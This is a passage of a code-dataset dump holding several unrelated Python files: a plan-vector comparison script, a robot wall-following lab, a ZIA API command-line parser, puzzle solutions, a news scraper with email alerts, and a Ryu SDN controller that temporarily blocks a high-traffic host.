len(word_list)\n rule_indexs = read_rule_file(AQP_node_index_path)\n\n # 清空fre_dict\n f_dict = open(AQP_node_fre_path, 'w')\n f_dict.truncate(0)\n\n for word_text in rule_indexs:\n word_frequency = get_word_frequency(word_text, word_counts, word_list_len)\n # a_value = a / (a + word_frequency)\n with open(AQP_node_fre_path, 'a+') as fw:\n s = str(word_text) + \" \" + str(word_frequency) + '\\n'\n fw.write(s)\n\n\ndef getAvalueDict():\n \"\"\"\n 根据fredict.txt文件中的index-value序列,创建以index为索引,值为value的一维数组avaluedict\n :return:\n \"\"\"\n getWordFrequencyDict(word_list)\n avaluedict = {}\n for line in open(AQP_node_fre_path):\n kv = line.split(\" \")\n avaluedict[kv[0]] = kv[1].replace(\"\\n\", \"\")\n return avaluedict\n\n\ndef getVectorAQPs():\n \"\"\"\n 对于AQP实例序列,补充每个AQP实例的sentence vector\n :return:\n \"\"\"\n AQPs = getRedisAQPs() # AQP 实例序列\n avaluedict = getAvalueDict() # 根据fredict.txt,构建以node index为索引,单词频率为值的一维数组\n sentence_list = [] # Sentence实例(AQP节点序列)的序列\n # 将每个AQP对应的Word实例序列,作为参数创建一个Sentence实例\n for i in range(len(AQPs)):\n 
sentence_list.append(Sentence(AQPs[i].statement))\n # 将每个method对应的Sentence实例转换为vector\n sentence_vectors = sentence_to_vec(sentence_list, embedding_size, avaluedict)\n # 将sentence_vectors赋值给method中对应的成员变量\n for i in range(len(AQPs)):\n AQPs[i].vector = sentence_vectors[i]\n return AQPs\n\n\ndef cal_l2_dist(vec1, vec2):\n return np.sqrt(np.sum(np.square(vec1 - vec2)))\n\n\ndef cal_distance(vec1, vec2):\n dist = np.linalg.norm(vec1 - vec2)\n return dist\n\n\ndef min_max_normalization(distance_list):\n min_max_scaler = preprocessing.MinMaxScaler()\n distance_list_norm = min_max_scaler.fit_transform(np.array(distance_list).reshape(-1, 1))\n return distance_list_norm\n\n\ndef method_compare():\n \"\"\"\n 对于redis中的每个method(由Word实例序列够成),通过sent2vec,\n 利用单词频次和权重,处理得到每个method的sentence vector,\n 接着,两两计算得到sentence vector间的欧氏距离\n :return: 返回欧氏距离矩阵\n \"\"\"\n # 得到redis中每个AQP对应的AQP class实例:包含sentence vector\n AQPs = getVectorAQPs()\n\n # 输出AQP个数\n print(\"the number of AQPs:\", len(AQPs))\n\n # 得到每个AQP与QEP的向量距离\n distance_list = [0]\n for i in range(len(AQPs)):\n if i == 0:\n continue\n distance_list.append(cal_l2_dist(AQPs[0].vector, AQPs[i].vector))\n\n # 得到归一化的向量距离\n distance_list_norm = min_max_normalization(distance_list)\n for i in range(len(AQPs)):\n AQPs[i].distance_norm = distance_list_norm[i][0]\n AQPs[i].distance = distance_list[i]\n\n # 按照向量距离从大到小对AQPs排序\n AQPs_sorted = sorted(AQPs, key=lambda aqp: aqp.distance, reverse=True)\n\n print(\"farthest AQP from QEP: \", AQPs_sorted[0].id, AQPs_sorted[0].distance_norm)\n print(\"closet AQP from QEP: \", AQPs_sorted[len(AQPs) - 1].id, AQPs_sorted[len(AQPs) - 1].distance_norm)\n return AQPs_sorted\n\n\ndef i_tips(cnt):\n return AQPs_sorted[cnt]\n\n\ndef b_tips(k):\n return AQPs_sorted[:k]\n\n\ndef calculate_interestingness(selected_AQPs):\n \"\"\"\n 对\n :param selected_AQPs:\n :return:\n \"\"\"\n\n interestingness = 0\n\n return interestingness\n\n\nif __name__ == '__main__':\n # 输入查询name\n print('input the name of query')\n query_name = input()\n\n # 得到被检测源码中每个method的key\n jedis = redis.Redis(host='127.0.0.1', port=6379, db=0)\n keys = jedis.keys()\n\n data_size = len(keys) # redis中method的个数/记录的条数\n word_list = [] # 存储redis中存在于node-vec字典中的node index\n embedding_size = 128 # 记录node vector的维度\n\n # 得到node-vec字典训练数据\n dict_path = os.path.abspath(os.path.dirname(os.getcwd())) + '/GenerateTreeVector/dictfile/new/'\n AQP_node_index_path = dict_path + 'AQPNodeIndex.txt'\n AQP_node_vector_path = dict_path + 'AQPNodeVector.txt'\n AQP_node_fre_path = dict_path + 'AQPNodeFreDict.txt'\n\n # 得到skip gram模型训练得到的node-vec字典\n AQP_node_dict = get_AQP_node_dict(AQP_node_index_path, AQP_node_vector_path)\n\n time_start = time.time()\n print(\"开始时间:\", time.time())\n print(\"data_size: \", data_size)\n\n # 比较得到QEP与每个AQP vector间的欧氏距离\n AQPs_sorted = method_compare()\n time_end = time.time()\n print(\"结束时间:\", time.time())\n print('time cost', time_end - time_start, 's')\n\n # 记录消耗时间\n print('time cost', time_end - time_start, 's')\n fout_time = open(\n os.getcwd() + '/output/' + query_name[0:4] + '/' + query_name[5:] + '/generate_aqp_vector_time.txt',\n 'w+')\n fout_time.write(str(time_end - time_start))\n fout_time.close()\n\n # choose TIPS\n print(\"i(i-tips) / b(b-tips?\")\n\n choose = input()\n\n if choose == 'i':\n cnt = 0\n while choose == 'i':\n t = i_tips(cnt)\n print(cnt, t.id, t.distance_norm)\n cnt += 1\n choose = input()\n elif choose == 'b':\n # get k\n print(\"input the number of AQPs to be selected(q to quit)\")\n k = input()\n\n # get name & id\n db_name = 
query_name[0:4]\n query_id = query_name[5:]\n\n # 将selected AQP序号写入到相应文件中\n output_file_path = (os.path.abspath(\n os.path.dirname(os.getcwd())) + '/GenerateTreeVector/output/' + db_name + '/' + query_id + '/' + str(k) + '_selected_aqps.txt')\n\n # get selected AQPs\n aqps = b_tips(int(k))\n\n # convert to string\n selected_query = ''\n for i in range(int(k)):\n print(i, aqps[i].id, aqps[i].distance_norm)\n selected_query += str(aqps[i].id)+'\\n'\n selected_query = selected_query.rstrip('\\n')\n\n # storage\n output_file = open(output_file_path, 'w')\n output_file.write(selected_query)\n output_file.close()\n\n else:\n print(\"wrong char\")\n","repo_name":"ZiHao256/InfoPlan","sub_path":"EmbeddingMethod/src/GenerateTreeVector/generate_and_compare.py","file_name":"generate_and_compare.py","file_ext":"py","file_size_in_byte":8983,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"36012075244","text":"'''\r\nSamuel Howell \r\nCS330\r\nProject 5\r\n\r\n\r\nNote: you need to install pkgs from the cmd line outside of the vs code application\r\n'''\r\n\r\nfrom Robot import Robot\r\nimport time\r\n\r\n\r\n\r\nbyteList = []\r\nflag = False\r\nrobot = Robot('COM3')\r\ndirection = \"n\"\r\n\r\n#! MAKE SURE THE CORD IS PLUGGED ALL THE WAY IN\r\ndef initRobot():\r\n robot.reset() \r\n time.sleep(1)\r\n robot.start()\r\n time.sleep(1)\r\n robot.safe()\r\n time.sleep(1)\r\n print(\"ready to run\")\r\n robot.clearBuffer()\r\n\r\n \r\n\r\ninitRobot()\r\n\r\n# move forward until bump\r\nwhile(flag == False):\r\n robot.driveDirect(0,150,0,150)\r\n\r\n robot.sendCommand(b'\\x8E\\x07') # bump detected\r\n readList = robot.read(1)\r\n \r\n\r\n bumpDetected =(int(readList[0], 2) & 1 == 1 or int(readList[0], 2) & 2 == 2) # use bitmasking to isolate and check each status bit to determine if left or right bump have been triggered\r\n \r\n if(bumpDetected):\r\n flag = True\r\n print(\"bump detected\")\r\n robot.driveDirect(254,150,254,150) # drive backward to create some space for the turn\r\n time.sleep(.2)\r\n robot.driveDirect(0, 150, 255, 106) #rotate 90 degrees in a west direction to get the wall to the right of the wall sensor. #! make sure robot is rotating enought to get a good inital read from the side\r\n time.sleep(1.5) \r\n robot.driveDirect(0,0,0,0)\r\n \r\n\r\n\r\nwhile(flag == True):\r\n #robot.driveDirect(0,50,0,50)\r\n #robot.sendCommand(b'\\x8E\\x07') # bump detected\r\n \r\n robot.queryLight()\r\n byteList.append(robot.readTwo()) #! make sure that you come in from the side more so than you think\r\n \r\n\r\n\r\n currentByte = int(str(byteList[len(byteList)-1]).lstrip('[').rstrip(']')) # this takes \"[x]\" and makes is \"x\" so it can be converted to an int.\r\n print(\"current: \" + str(currentByte))\r\n \r\n error = 150 - currentByte # desired distance - actual distance\r\n ref = 40\r\n prop = robot.pController(error)\r\n\r\n print(\"prop: \", str(prop), \" error: \" + str(error), \" distance: \", str(currentByte))\r\n \r\n\r\n # wait for serial comm to stop sending before you run program again\r\n # current byte is measurement from the wall. 
we want to keep it at around 40\r\n\r\n if (currentByte > 150):\r\n currentByte = 150\r\n if (currentByte == 0): # ifthe robot is too far away from the wall, set current byte to ref - 1 to send the robot right.\r\n currentByte == ref - 1\r\n if (currentByte < ref): # move closer to the wall, turning right #!can change 10 to 0 for even tighter turns if necessary depending on complexity of the obstacle\r\n robot.driveDirect(0, 50 - prop, 0, 50 + prop)\r\n print(\"R\")\r\n if (currentByte > ref): # move away from the wall, turning left\r\n robot.driveDirect(0, 50 + prop, 0, 50 - prop)\r\n print(\"L\")\r\n if (currentByte == ref): # go straight\r\n robot.driveDirect(0, 70, 0, 70)\r\n\r\n \r\n #check for a bump\r\n robot.sendCommand(b'\\x8E\\x07') # bump detected\r\n readList = robot.read(1)\r\n bumpDetected =(int(readList[0], 2) & 1 == 1 or int(readList[0], 2) & 2 == 2)\r\n \r\n if(bumpDetected):\r\n robot.driveDirect(0, 150, 255, 106) #rotate 90 degrees in a west direction to get the wall to the right of the wall sensor. #! make sure robot is rotating enought to get a good inital read from the side\r\n time.sleep(.3)\r\n robot.driveDirect(0, 0, 0, 0)\r\n \r\n \r\n if(len(byteList) > 5): # don't let the list grow large\r\n byteList.pop(0)\r\n\r\n\r\n\r\n\r\n'''\r\n*65% of the grade:*\r\nUSE P-CONTROLLER ONLY: Write a program that commands the iRobot Create to respond in the following ways:\r\n1. Start the robot driving. It should drive until it contacts a wall – you may ensure there is nothing else in its path. At the wall, it should rotate and align itself parallel to the surface.\r\n2. Once the robot is parallel to the surface of the wall, it should begin translating again keeping a set distance from the surface (you decide distance).\r\n3. While following the wall, it should pay attention to its bump sensors and using those along with its wall range sensor and should attempt to circumnavigate anything–imagine a shoe–it finds in its way.\r\n4. Points will be awarded for how well the robot stabilizes following the wall, how well it corners and how well it circumnavigates obstacles along the wall.\r\n\r\n*10% of the grade:*\r\n5. Upload a video of your robot driving along the wall with the same obstacles to YouTube. The video should be named the following way:FMU CS330 Robotics Fall 2022, Lab Project #5, [first, last names of all the students in the team]: Kp=[your Kp].\r\n\r\n*15% of your grade:*\r\n6. Create a report where you explain how you choose a period of quering sensor data, reference, Kp, Ki, Kd, transition function, draw a control system you use in your project.\r\n\r\n*10% of your grade:*\r\n7. Slack usage:\r\n7.1 Learn how to share files on Slack using Googe Drive. Share a file with your partner (team).\r\n7.2 Learn how to incorporate the Trello app in a slack. 
Learn how to add a card, make a comment, assign a teammate to a card.\r\n7.3 Send a private video message to your partner with some meaningful content.using /voice command.\r\n7.4 Set up a zoom conference via slack (using /zoom).\r\n7.5 Also, using the https://lunchtrain.builtbyslack.com/ schedule a lunch with your partner (yourself), and make him join you, show me the reminders from the slack bot\r\n'''\r\n","repo_name":"samuel-howell/CS330","sub_path":"project5.py","file_name":"project5.py","file_ext":"py","file_size_in_byte":5417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1560917068","text":"from .reduce_html import reduce_html\nfrom .send_email import send_email\n\n\nasync def get_html(url, browser):\n # browser = await launch(headless=True)\n\n page = await browser.newPage()\n\n try:\n await page.goto(url, timeout=30000)\n html = await page.evaluate(\n \"() => document.body.innerText\"\n )\n # html = await page.content()\n await page.close()\n return html\n except Exception as err:\n send_email(\n 'Ocorreu um erro no Radar da Inovação',\n body=f\"\"\"\n

      Erro no MSS SCAN EDITAIS
      \n
      Tentativa de acesso na URL: {url}
      \n
      Erro do console: {err}
      \n \"\"\"\n )\n\n return 'PÁGINA COM ERRO'\n\n\nasync def get_html_async(url, browser):\n html = await get_html(url, browser)\n html = reduce_html(html)\n print(f'TAMANHO DO TEXTO: {len(html)}')\n return html\n","repo_name":"caiogtoledo/mss_scan_editais","sub_path":"helpers/get_html_async.py","file_name":"get_html_async.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27615226800","text":"\"\"\"\nThis package contains the necessary structures to use the implemented methods of the zia_client.session.ZIAConnector class\nthrough the command line script ziaclient.py.\n\nAs of now, only the functionality for locations and users has been translated.\n\nSee the submodules for detailed functionality.\n\"\"\"\nimport argparse as ap\nimport ast\nimport datetime as dt\nimport json\n\nfrom api_parser._locations import create_location_subparser\nfrom api_parser._traffic import create_traffic_subparser\nfrom api_parser._users import create_user_subparser\n\n\ndef create_parser():\n \"\"\"\n Creates the parser. It calls the necessary functions to build the subparsers.\n\n Returns:\n Returns the built parser.\n \"\"\"\n parser = ap.ArgumentParser(\n description=\"\"\"**ZIA API command line script.**\n \n Python script that communicates with the Zscaler Internet Access API.\n It's composed of various subparsers, each one representing the configured modules in the `zia_client` module.\n \n The keyword arguments listed below can be always specified before the desired subparser.\"\"\"\n )\n\n # Main parser commands\n parser.add_argument('--pending', help=\"Lists pending changes.\", action='store_true')\n parser.add_argument(\n '--apply_after',\n help='Forces application of changes before logging out after several requests.',\n type=int,\n default=0\n )\n parser.add_argument('--conf', help='Specifies config file.', default='config/config.json')\n parser.add_argument('--creds', help='Specifies config file.', type=_json_obj_file, default=None)\n parser.add_argument('--output', '-o', help='Custom path where the output JSON will be stored.',\n default=_output_name())\n parser.add_argument('--no_verbosity', help='Disables detailed verbosity.', action='store_true')\n parser.add_argument('--print_results', '-p', help='Prints results.', action='store_true')\n\n # Create subparsers\n subparsers = parser.add_subparsers(required=True, dest='Any of the subcommands')\n\n # Create user parser\n create_user_subparser(subparsers)\n\n # Create location parser\n create_location_subparser(subparsers)\n\n # Create traffic parser\n create_traffic_subparser(subparsers)\n\n return parser\n\n\ndef _output_name():\n \"\"\"\n Creates a name for the output file where the search or operation results will be stored if no custom name is \\\n provided.\n\n Returns:\n str: A string with the format `search_%Y-%m-%d_%H-%M-%S.json`.\n ``Example: search_2021-01-01_14-13-12.json``\n\n\n \"\"\"\n today = dt.datetime.now().strftime(\"%Y-%m-%d_%H-%M-%S\")\n return f'query_{today}.json'\n\n\ndef _boolstring(arg):\n \"\"\"\n Checks api_parser that are not required and have default values on the server. 
Argument is a string but mus be\n converted to True, False or ''.\n\n Args:\n arg (str): Parsed argument.\n\n Returns:\n bool or empty string:\n \"True\" -> `True`\n\n \"False\" -> `False`\n\n Anything else -> `''`\n\n \"\"\"\n if arg == 'True':\n return True\n elif arg == 'False':\n return False\n else:\n return ''\n\n\ndef _json_obj_file(arg: str):\n if arg.endswith('.json'):\n with open(arg) as f:\n return json.load(f)\n else:\n data = ast.literal_eval(arg)\n try:\n return json.dumps(data)\n except json.JSONDecodeError:\n raise ap.ArgumentTypeError('Input should be a JSON object.')\n","repo_name":"javiruizs/ZIA-API-Connector","sub_path":"api_parser/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23617141791","text":"import sys, math, re\r\n\r\n \r\n\r\n\r\n\r\ndef main():\r\n# inFile = sys.__stdin__\r\n# outFile = sys.__stdout__\r\n inFile = open('B-large.in', 'rt')\r\n outFile = open(inFile.name.replace('.in', '.out'), 'wt')\r\n T = int(inFile.readline())\r\n for t in xrange(1,T+1):\r\n tt = inFile.readline().strip().split(' ')\r\n# print '------------------', tt\r\n tt.reverse()\r\n C = int(tt.pop())\r\n c = [tt.pop() for _ in xrange(C)]\r\n D = int(tt.pop())\r\n d = [tt.pop() for _ in xrange(D)]\r\n N = int(tt.pop())\r\n seq = list(tt.pop())\r\n out = ''\r\n cc = []\r\n for s in c:\r\n a,b,c = s\r\n expr = re.compile('(%s%s|%s%s)$' % (a,b,b,a))\r\n cc.append((expr, c))\r\n dd = []\r\n for s in d:\r\n a,b = s\r\n expr = re.compile('(%s.*?%s)|(%s.*?%s)' % (a,b,b,a))\r\n dd.append(expr)\r\n for s in seq:\r\n out += s\r\n for e, s in cc:\r\n out, n = e.subn(s, out, 1)\r\n for e in dd:\r\n if e.search(out):\r\n out = ''\r\n break\r\n \r\n outFile.write('Case #%d: [%s]\\n' % (t, ', '.join(out)))\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_75/217.py","file_name":"217.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30935967298","text":"def read_input():\n inputs = []\n\n input_file = open(\"input\")\n for line in input_file:\n inputs.append(line.strip('\\n'))\n\n return inputs\n\ndef gamma_rate(inputs):\n new_code = []\n\n for i in range(WORD_LENGTH):\n total_0s = 0\n total_1s = 0\n for _, value in enumerate(inputs):\n if int(value[i]) == 0:\n total_0s += 1\n else:\n total_1s += 1\n if total_0s > total_1s:\n new_code.append(0)\n else:\n new_code.append(1)\n\n return new_code\n\ndef epsilon_rate(inputs):\n new_code = []\n\n for i in range(WORD_LENGTH):\n total_0s = 0\n total_1s = 0\n for _, value in enumerate(inputs):\n if int(value[i]) == 0:\n total_0s += 1\n else:\n total_1s += 1\n if total_0s < total_1s:\n new_code.append(0)\n else:\n new_code.append(1)\n\n return new_code\n\ndef convert_to_dec(binary_num):\n dec_value = 0\n for i in range(WORD_LENGTH-1, -1, -1):\n if binary_num[WORD_LENGTH-1-i] == 1:\n dec_value += (2**i)\n return dec_value\n\ndef find_o2_rating(inputs, position, current_size):\n total_0s = 0\n total_1s = 0\n\n if current_size == 1:\n return inputs\n\n for i in range(current_size):\n if int(inputs[i][position]) == 0:\n total_0s += 1\n else:\n total_1s += 1\n\n keep_value = 1\n keep_inputs = []\n if total_0s > total_1s:\n keep_value = 0\n\n for i in range(current_size):\n if int(inputs[i][position]) == keep_value:\n 
keep_inputs.append(inputs[i])\n else:\n current_size -= 1\n\n return find_o2_rating(keep_inputs, position+1, current_size)\n\ndef find_co2_rating(inputs, position, current_size):\n total_0s = 0\n total_1s = 0\n\n if current_size == 1:\n return inputs\n\n for i in range(current_size):\n if int(inputs[i][position]) == 0:\n total_0s += 1\n else:\n total_1s += 1\n\n keep_value = 0\n keep_inputs = []\n if total_0s > total_1s:\n keep_value = 1\n\n for i in range(current_size):\n if int(inputs[i][position]) == keep_value:\n keep_inputs.append(inputs[i])\n else:\n current_size -= 1\n\n return find_co2_rating(keep_inputs, position+1, current_size)\n\n\nif __name__ == \"__main__\":\n values = read_input()\n global WORD_LENGTH\n WORD_LENGTH = len(values[0])\n\n # part 1\n gamma = gamma_rate(values)\n epsilon = epsilon_rate(values)\n\n dec_gamma = convert_to_dec(gamma)\n dec_epsilon = convert_to_dec(epsilon)\n print(dec_gamma*dec_epsilon)\n\n # part 2\n o2_rating = find_o2_rating(values, 0, len(values))\n co2_rating = find_co2_rating(values, 0, len(values))\n\n dec_o2_rating = int(o2_rating[0],2)\n dec_co2_rating = int(co2_rating[0],2)\n print(dec_o2_rating*dec_co2_rating)\n","repo_name":"jramdass/advent-of-code","sub_path":"2021/day-03/binary_diagnostic.py","file_name":"binary_diagnostic.py","file_ext":"py","file_size_in_byte":2929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21053168233","text":"from flask import Flask\nimport requests\nfrom bs4 import BeautifulSoup\nimport os\nimport sqlite3\nimport logging\n\nlogging.basicConfig(filename='example.log', level=logging.DEBUG)\n\nURL = os.environ['SOURCE_URL']\nAGENT = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'\n\napp = Flask(__name__)\n\n\ndef send_simple_message(title, message):\n return requests.post(\n os.environ['MAIL_URL'],\n auth=(\"api\", os.environ['MAILGUN_API_KEY']),\n data={\"from\": \"Embevent App \",\n \"to\": os.environ['MAIL_LIST'].split(\";\"),\n \"subject\": title,\n \"text\": message})\n\ndef processUpdates(cards):\n connection = sqlite3.connect(\"database.db\")\n cursor = connection.execute(\"Select * from CARDS\")\n old_cards = len(cursor.fetchall())\n\n if len(cards) > old_cards:\n logging.info(\"New updates. Processing\")\n \n card = cards[0]\n title = card.find_all('h2', class_='h3')[0].text\n date = card.find_all('h3', class_='h5')[0].text\n content = card.find_all([\"p\", \"div\"])[0]\n\n command2 = \"INSERT INTO CARDS (title, date, content) VALUES ('{0}', '{1}', '{2}')\".format(title,date,content)\n \n connection.execute(command2)\n connection.commit()\n connection.close()\n\n logging.info(\"Update stored in DB\")\n\n send_simple_message(title=title, message=card)\n\n logging.info(\"Mail sent\")\n return card.text\n else:\n logging.info(\"No updates generated\")\n f = cards[0]\n the_date, = f.find_all('h3', class_='h5')\n return \"No news. Last update: {0}. 
articles available: {1}\".format(the_date.text, old_cards)\n\n@app.route('/')\ndef news():\n if not URL:\n return \"No URL added\"\n response = requests.get(URL, headers={'User-Agent': AGENT })\n soup = BeautifulSoup(response.content, 'html.parser')\n cards = soup.find_all('div', class_='card')\n return processUpdates(cards)","repo_name":"mleger45/embevent","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23608375081","text":"import sys\r\n\r\nfp = open('large.in', 'r')\r\nout = open('output', 'w')\r\n\r\n#fp = open('input', 'r')\r\n#out = sys.stdout\r\n\r\ncases = int(fp.readline())\r\n\r\nfor case in range(cases):\r\n existe = set()\r\n \r\n parms = [int(x) for x in fp.readline().split()]\r\n\r\n for x in range(parms[0]):\r\n row = fp.readline().strip()\r\n path = '/'\r\n for dir in row[1:].split('/'):\r\n# print path + dir\r\n existe.add(path + dir)\r\n path = path + dir + '/'\r\n \r\n result = 0\r\n for y in range(parms[1]):\r\n row = fp.readline().strip()\r\n path = '/'\r\n for dir in row[1:].split('/'):\r\n# print path + dir\r\n if path+dir not in existe:\r\n result += 1\r\n existe.add(path+dir)\r\n path = path + dir + '/'\r\n \r\n out.write('Case #' + str(case + 1) + ': ' + str(result) + '\\n')\r\n case += 1\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_59/332.py","file_name":"332.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12098841429","text":"# coding: utf-8\n# In[ ]:\n\n# 本實驗延續blockh3_with_bdwith.py\n# 模擬:\n# 假設 host3 被判定為可疑來源並 增加entry來block h3 後,管理員願意在50個單位時間後,重新開放權限給host3來送資料\n# 測試:\n# mininet端輸入 h1 ping h3 -s 3000\n# 以及mininet端輸入 h1 ping h3 -s 5000兩種情形\n# 觀察:\n# 1. mininet: 當被Block住 ping 即會失敗,過了一段時間後h3又可以繼續送資料\n# 2. 
ryu: 當被Block住後,port1 的rx, tx 均不會再增加\n# 而port3 的rx 會持續增加(因為惡意攻擊還是送得進來), 但tx則不會再增加\n# (過了一段時間後)\n# 解除Block ,port1 rx, tx, tx-flow/time 會重新開始增加\n# port 3 的 tx, tx-flow/time 也會重新開始增加\n# 則表示我們成功解除h3的Block了\n# (直到tx-flow/time超過5000,又會被block住 如此循環)\n# 方法:\n# 當Block entry被建立的同時,會將Block_flag set\n# 系統即會進入計數的階段,\n# 當一數到50則將舊的BlockEntry刪除,並會觸發一次新的Packet-In事件\n# 未來:\n# OFPMatch()的判斷條件要再更彈性一點,即(不再單單只是監測host3,而是整個網路)\n# 以限定流量大小,取代原有的直接Block住\n# Note:\n# 新增del_flow()這個函式去實踐刪除Entry的動作\n#-----\n# 07.02更新:加入物件導向編程, 新增class Host.py\n#\nimport Host\nfrom ryu.base import app_manager\nfrom ryu.controller import ofp_event\nfrom ryu.controller.handler import CONFIG_DISPATCHER, MAIN_DISPATCHER, DEAD_DISPATCHER\nfrom ryu.controller.handler import set_ev_cls\nfrom ryu.ofproto import ofproto_v1_3\nfrom ryu.lib.packet import packet\nfrom ryu.lib.packet import ethernet\nfrom operator import attrgetter \nfrom ryu.lib import hub\nfrom ryu.lib.packet import ether_types\nimport os\n\nmonitor_time = 1\n#monitor_time為單位時間,每過 X 秒,monitor就更新一次,並統計每個port在該秒跟五秒前的流量差異\n\nhost = [0 for n in range(0,100)]\n\nfor i in range (0,100):\n host[i] = Host.port_information(i)\n\nclass SimpleSwitch13(app_manager.RyuApp):\n \n OFP_VERSIONS = [ofproto_v1_3.OFP_VERSION]\n def __init__(self, *args, **kwargs):\n super(SimpleSwitch13, self).__init__(*args, **kwargs)\n self.mac_to_port = {}\n self.datapaths = {}\n self.monitor_thread = hub.spawn(self._monitor)\n #============================monitor============================#\n\n @set_ev_cls(ofp_event.EventOFPStateChange,\n [MAIN_DISPATCHER, DEAD_DISPATCHER])\n def _state_change_handler(self, ev):\n datapath = ev.datapath\n if ev.state == MAIN_DISPATCHER:\n if not datapath.id in self.datapaths:\n self.logger.debug('register datapath: %016x', datapath.id)\n self.datapaths[datapath.id] = datapath\n elif ev.state == DEAD_DISPATCHER:\n if datapath.id in self.datapaths:\n self.logger.debug('unregister datapath: %016x', datapath.id)\n del self.datapaths[datapath.id]\n\n def _monitor(self):\n while True:\n for dp in self.datapaths.values():\n self._request_stats(dp)\n global monitor_time\n hub.sleep(monitor_time)\n# monitor每��monitor time秒,便更新一次,此monitor_time值設定在code最前面,以global方式宣告\n\t\n def _request_stats(self, datapath):\n self.logger.debug('send stats request: %016x', datapath.id)\n ofproto = datapath.ofproto\n parser = datapath.ofproto_parser\n\n req = parser.OFPFlowStatsRequest(datapath)\n datapath.send_msg(req)\n\n req = parser.OFPPortStatsRequest(datapath, 0, ofproto.OFPP_ANY)\n datapath.send_msg(req)\n\n @set_ev_cls(ofp_event.EventOFPFlowStatsReply, MAIN_DISPATCHER)\n def _flow_stats_reply_handler(self, ev):\n body = ev.msg.body\n\n self.logger.info('datapath '\n 'in-port eth-dst '\n 'out-port packets bytes')\n self.logger.info('---------------- '\n '-------- ----------------- '\n '-------- -------- --------')\n for stat in sorted([flow for flow in body if flow.priority == 1],\n key=lambda flow:(flow.match['in_port'],\n flow.match['eth_dst'])):\n self.logger.info('%016x %8x %17s %8x %8d %8d',\n ev.msg.datapath.id,\n stat.match['in_port'], stat.match['eth_dst'],\n stat.instructions[0].actions[0].port,\n stat.packet_count, stat.byte_count)\n \n \n @set_ev_cls(ofp_event.EventOFPPortStatsReply, MAIN_DISPATCHER)\n def _port_stats_reply_handler(self, ev):\n body = ev.msg.body\n msg = ev.msg\n datapath = msg.datapath\n parser = datapath.ofproto_parser\n ofproto = datapath.ofproto\n global monitor_time\n self.logger.info('datapath port '\n 'rx-pkts rx-bytes rx-error '\n 'tx-pkts tx-bytes tx-error 
tx-flow/time')\n self.logger.info('---------------- -------- '\n '-------- -------- -------- '\n '-------- -------- -------- -----------')\n for stat in sorted(body, key=attrgetter('port_no')):\n num = 0\n if stat.port_no <= 10:\n num = stat.port_no\n host[num].set_now(stat.tx_bytes)\n host[num].set_flow(host[num].now - host[num].last)\n host[num].set_flow(host[num].flow / monitor_time)\n host[num].set_last(host[num].now)\n #self.change_now(num,stat.tx_bytes)\n #self.change_flow(num,now[num]-last[num])\n #self.change_flow(num,flow[num]/monitor_time)\n #self.change_last(num,now[num])\n self.logger.info('%016x %8x %8d %8d %8d %8d %8d %8d %8d', \n ev.msg.datapath.id, stat.port_no,\n stat.rx_packets, stat.rx_bytes, stat.rx_errors,\n stat.tx_packets, stat.tx_bytes, stat.tx_errors, host[num].flow )\n if (stat.port_no == 3) and (host[num].flow >= 5000):\n host[num].set_blocked_flag(True)\n instruction = [parser.OFPInstructionActions(ofproto.OFPIT_CLEAR_ACTIONS, []) ]\n self.logger.info(\"Blocked host 3's entry adding\")\n match = parser.OFPMatch(eth_src = '00:00:00:00:00:03')\n blockflow = parser.OFPFlowMod(datapath,\n priority = 2,\n command = ofproto.OFPFC_ADD,\n match = match,\n instructions = instruction\n )\n self.logger.info(\"Block entry: %s\" % str(blockflow));\n datapath.send_msg(blockflow)\n if(host[num].blocked_flag):\n self.logger.info(\"Host%d's Block Timer: %d\" % (num,host[num].blocked_timer));\n host[num].blocked_timer_add()\n if(host[num].blocked_timer == 50+monitor_time): #Re-Open the blocked host\n host[num].blocked_init()\n empty_match = parser.OFPMatch(eth_src = '00:00:00:00:00:03')\n instructions = []\n flow_mod = self.del_flow(datapath, empty_match,instructions)\n self.logger.info(\"Delete the Blocked entry(Re-Open Success!)\")\n num = 0\n\n #============================monitor============================#\n\n #============================SWITCH============================#\n\n\n @set_ev_cls(ofp_event.EventOFPSwitchFeatures, CONFIG_DISPATCHER)\n def switch_features_handler(self, ev):\n datapath = ev.msg.datapath\n ofproto = datapath.ofproto\n parser = datapath.ofproto_parser\n\n match = parser.OFPMatch()\n actions = [parser.OFPActionOutput(ofproto.OFPP_CONTROLLER,\n ofproto.OFPCML_NO_BUFFER)]\n self.add_flow(datapath, 0, match, actions)\n\n def add_flow(self, datapath, priority, match, actions, buffer_id=None):\n ofproto = datapath.ofproto\n parser = datapath.ofproto_parser\n\n inst = [parser.OFPInstructionActions(ofproto.OFPIT_APPLY_ACTIONS,\n actions)]\n if buffer_id:\n mod = parser.OFPFlowMod(datapath=datapath, buffer_id=buffer_id,\n priority=priority, match=match,\n instructions=inst)\n else:\n mod = parser.OFPFlowMod(datapath=datapath, priority=priority,\n match=match, instructions=inst)\n datapath.send_msg(mod)\n\n def del_flow(self, datapath, match,instructions):\n ofproto = datapath.ofproto\n parser = datapath.ofproto_parser\n\n mod = 